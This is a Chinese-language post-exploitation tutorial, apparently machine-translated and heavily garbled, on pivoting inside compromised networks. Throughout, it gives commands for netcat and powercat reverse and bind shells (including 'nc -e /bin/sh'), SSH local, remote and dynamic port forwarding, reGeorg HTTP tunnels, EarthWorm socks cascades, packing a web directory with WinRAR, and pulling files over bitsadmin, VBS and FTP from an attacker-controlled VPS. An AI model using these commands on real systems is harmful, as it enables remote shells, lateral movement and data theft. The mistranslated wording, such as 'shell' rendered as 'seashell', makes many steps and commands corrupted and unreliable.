目录

一、传输层隧道技术

一. Netcat获得贝壳(反向贝壳)。

然后,检查一下目标主机是否安装了 nc 。

第二,目标主机没有安装 nc, 可以用php 反弹 。

最后,用Python反弹贝壳

二. Netcat创造了一个内线来获取贝壳。

使用电动工具

一. 实时检索

二. 电手获得反向贝壳

三. 通过Powercat移交文件

强力猫是代理。

二、应用层隧道技术

SSH协议隧道技术就是其中之一

1.环境搭建

用于建立shsh隧道的两层SSH设置

3.sh-当地港口转运

Ssh- 远程端口中继中继

Ssh- 动态传送港

2. HHTTP协议隧道作业技术

reGeorg: reGeorg: reGeorg: reGeorg: reGeorg: reGeorg:

2.常见参数说明

3.复现

3.socks代理

1.socks简介

2. 袜子剂和港口转运剂之间的区别

Eworth(EW)是一个工具。

socks二级级联

Lcx_ listen 和 Lcx_ slave 被用于创建多级级联 。

4.压缩数据

WINAR是四个工具

5.上传下载

五.1 FTP上传,这需要使用 FTP 账户和密码

5.2 通过VBS和VPS上传

五.3 使用比萨德明下载

一、传输层隧道技术

一. Netcat获得贝壳(反向贝壳)。

然后,检查一下目标主机是否安装了 nc 。

• 注意当地港口的55人。
  • 
• 有效载荷应输入目标主机。
• 看看贝壳有没有弹回飞机上
  • 

第二,目标主机没有安装 nc, 可以用php 反弹 。

1. 首先还是注意当地港口的55人。
2. 然后目标主机将输入有效载荷。

3. 之后,检查当地宿主以确定反弹壳是否有效。

4. 

最后,用Python反弹贝壳

二. Netcat创造了一个内线来获取贝壳。

网络服务器(kali2021)是公共网络服务器(kali2019)的代理访问服务器(窗口7)。

1. 现在,在你自己的服务器上, 听听港口。
   1. 

2. 最后,在目标主机上,运行 nc 脚本程序,并使用定义的端口连接到 shell 。

   1. 

   2. Linux Nc - lvp 55 - e/bin/sh

   3. - lvp 55 - e: 窗口系统32cmd

3. 边境服务器端口之间最后连接的端口服务器

   1. nc -v 10.2.1.170 8888 -c "nc -v 172.31.1.69 5555"

   2. 

4. 接下来我们看看能不能让贝壳反弹

   1. 

使用电动工具

com/这篇文章是我们特别报导全球之声Online. com/besimorhino/powercat的一部分。

一. 实时检索

1. 然后,打开目标的电动猫。
2. 然后,有行政权, 执行cMD。
3. 无法关闭临时文件夹:%s。
4. 和,在引言句Powercat:
5. Powercat -l -p 66 - e cmd -v -v -v -v -v -v -v -v -v -v -v -v
6. 
7. 最后,欧盟聆听主机港:
8. 

二. 电手获得反向贝壳

1. 第一步先监听端口
2. 第二步使用强力猫:强力猫-p-p-99-e-cmd
3. 
4. 

三. 通过Powercat移交文件

1. 在 Windows 7 中,使用以下命令: powercat-l-p 44-tell.txt-v
2. 
3. Windows server 2012:     powercat –c 192.168.150.7 –p 4444 –i c:1.txt –v
4. 您可以在按 ctrl+c 键之前继续添加到2012年, 此时传输将被终止 。

强力猫是代理。

虚拟机器出问题了

C：powercat –l –v –p 6666 –e cmd.exe

B:Powercat -l -v -p 800 -r tcp: 66(作为跳板)

A：nc 192.168.150.12 8000 –vv

二、应用层隧道技术

SSH协议隧道技术就是其中之一

1.环境搭建

1. 无法启动 Evolution 的邮件组件 。
2. 如果允许根登录, 允许 Root Login 设定为真 。
3. 
4. 密码输入 是 启用基于密码的验证 。
5. 是的,允许TCPForward。
6. 
7. 如果Gatway Ports设为是,则允许远程主机与当地转运港口连接。
8. 确实,TCPServeAlive会让你的心跳 和你的碎裂。
9. 
10. 重启ssh
    1. Service ssh restart
    2. /etc/init/ssh restart

用于建立shsh隧道的两层SSH设置

• - 现在的传输,提高传输速度。
• -f 不使用当前 shell 将 Ssh 移动到后台执行
• - N-静静连接(连接但未附于某届会议)
• 使远程主机能够连接到本地端口转发。
• 当地港口的中继
• R代表远程港口中继系统
• - D 套接头(动力)
• - p 设置 ssh 的端口

3.sh-当地港口转运

B是连接A和C的中间服务器,但A和C没有连接(或C无法连接A),因此 vps可以使用以下港口转运机制。

A10.2.1.88    B:10.2.170  C:72.31.1.69

1. 要开始, 类型: ssh- CfNg- L22: 3389 root@
2. 目标主机 : 目标端口@midwebserposrip ssh- CfNg - L 本地端口 (vps) :
   1. 
3. 那你只要输入密码就行了
4. 桌面: 11 是 B 服务器上最近访问过的端口 。
   1. 

Ssh- 远程端口中继中继

远程端口正在远程主机上的一个端口监听,任何试图到达远程服务器上指定端口的数据都会通过 ssh 隧道传送到本地等同的端口。

由于B是可访问A和C的中间服务器,但A和C没有连接(或C可能达到A),在中间服务器上可以使用下列港口转运方法。

A10.2.1.88    B:10.2.170  C:72.31.1.69

1. ssh -CfNg -R 888:172.31.1.1:3389 root@10.2.1.170
2. 输入 170 密码后连接 。
3. 

Ssh- 动态传送港

要输入网络服务器密码,请在中间服务器上执行以下命令,以创建动态 SOCKS 4/5 代理频道。

1. 先在网络服务器上执行以下命令 : ssh - CfNg - R 22 - 3389 root@
2. 然后输入密码
3. 将公共网络服务器的代理文件更改为 Vi/ etc/ 代理链。 抱歉, conf 。
4. 
5. 应使用代理链卷卷:80。
6. 

简而言之,动态港口转运公司利用网络服务器作为代理,允许攻击者访问网络服务器的资源。

2. HHTTP协议隧道作业技术

reGeorg: reGeorg: reGeorg: reGeorg: reGeorg: reGeorg:

https://github.com/sensepost/reGeorg

正如您所看到的,工具包含大量的脚本, 您必须选择合适的脚本 。

2.常见参数说明

• 我们会继续解密 取决于我们之前的工作

• -S 使用 SSL 协议连接 -P 提供密码字典(文件)

• - 指定端口,以及 - t 指定多条路线的数目。

• -l 指定用户名; -vV 显示进程信息。

• - L,提供用户姓名簿。

3.复现

1. 首先, 修改代理文件。 允许代理访问 。
2. python reGeorgSocksProxy.py –u http://172.31.1.69/tunnel.nosocket.php -p 9050
3. 

3.socks代理

1.socks简介

• 索克斯探员不能执行套接头,不能混为一谈
• 标准插座隧道必须有两个终点一侧为服务端，它在一个端口监听客户连接,而另一个是客户。通过输入服务 IP 地址和端口号, 自动连接到服务器 。港口中继工具(lcx/htran)通过连接两个插座隧道进行工作。建造一条能“双向和两步通信”的曲速隧道
• 袜子代理核心: 协助他们完成网络插座接入。当我们使用代理服务器访问网站时,我们也可以上网。索克斯服务器其实是个中间人他们单独交谈(browser/visited网页)。然后将结果转告另一方。
• 索克斯特工的工作如下:当我们访问一个网站时, 我们开始考虑我们能做些什么。浏览器最初将一些基本信息(URL和服务端口)传送到Socks服务器。在索克斯服务器对这些数据进行解析后浏览器将取代浏览器, 查看者将访问网站 。此外,将访谈结果传送到浏览器端。

2. 袜子剂和港口转运剂之间的区别

• 通信议定书不提供插座港口转运,需要一份袜子议定书来支持袜子制剂。
• Socket 端口功能不同 。
• 有几对袜子的替代物 港口是一对一

Eworth(EW)是一个工具。

1. EarthWorm正在下载中 。
2. 袜子、螺旋桨、螺旋桨、螺旋桨、 lcx_slave、 lcx_listen、 lcx_tran 是六种命令格式 。
3. 将袜子与代理人连接(双向通信)。
   1. ./ew_for_linux64 -s ssocksd -l 1080
   2. 
   3. 启用时, 此服务器将作为代理操作 。
   4. 最后,在 19 个服务器的顶端, 编辑代理配置文件 。
   5. proxychains curl 172.31.1.69
      
   6. 
4. Socks() 的反向代理()

   1. 开始由客户提供索克斯服务。

   2. ./ew_for_linux64 -s rcsocks -l 7777 -e 8888

   3. 然后

   4. 内网服务器接连到袜子服务器:

   5. 

   6. 然后将再次编辑公共网络服务器上的代理配置文件, 并设定为网络服务器代理服务器的 77 端口 。

   7. 

5. socks二级级联

   1. 在目标服务器上运行以下命令:ew - socksd - l 99
   2. 在中间服务器上运行以下命令:新建 - s lcx_traran - l 1080 - f - g 99
   3. 

6. Lcx_ listen 和 Lcx_ slave 被用于创建多级级联 。

   1. w_s lcx_listen - l 1080 - e 88 e lcx_listen - l 1080 - e 88 e lcx_listen - l l lcx_listen - l 1080 - e 88 e ws

   2. 

   3. 在目标服务器上运行以下命令:ew - socksd - l 77

   4. 

   5. w-s lcx_slave-d-e 88-f-g 77 w-s lcx_slave-d-e 88-f

   6. 

4.压缩数据

WINAR是四个工具

WINRar是一个强大的文件压缩和压缩工具。大多数压缩文件类型都得到支持 。如果目的地主机安装了 Winrar,可以直接使用，如果没有安装，可以在本地安装后，这是第一次在万维网网站(CC BY-NC-NC-SA 2. 0)上播放录像。上传到预定主机必须指出,WinAR操作系统版本和目标主机都必须在同一操作系统中安装。否则可能出错

• pull a-k-r-s-s-m3 c-wet.rr c: 压缩网
• (将 C:web 目录的内容放到 1.rr 并放在 C:web)
• rr e c:rrar rr c:rar

5.上传下载

五.1 FTP上传,这需要使用 FTP 账户和密码

• 获得1.txt/获得1.txt/获得1.txt/获得1.txt/获得1.
• / / / / / / / / / / / / /
• 上传 1.txt / 发送 1.txt
• 退出/结束会议
• Cd <name>        //进入目录
• Lcd <文件夹路径>    //定位本地文件夹

5.2 通过VBS和VPS上传

执行以下两个命令下载 vps 上的文件, 这就需要更改 vps 的 IP 地址和下载位置 。

2.Cscript down.vbs

五.3 使用比萨德明下载

1. bitsadmin /rawreturn /transfer getfile http://192.168.150.7/1.txt c:111.txt
2. bitsadmin /transfer q http://192.168.150.7/1.txt c:1.txt

本文由 在线网速测试 整理编辑，转载请注明出处，原文链接：https://www.wangsu123.cn/news/21765.html。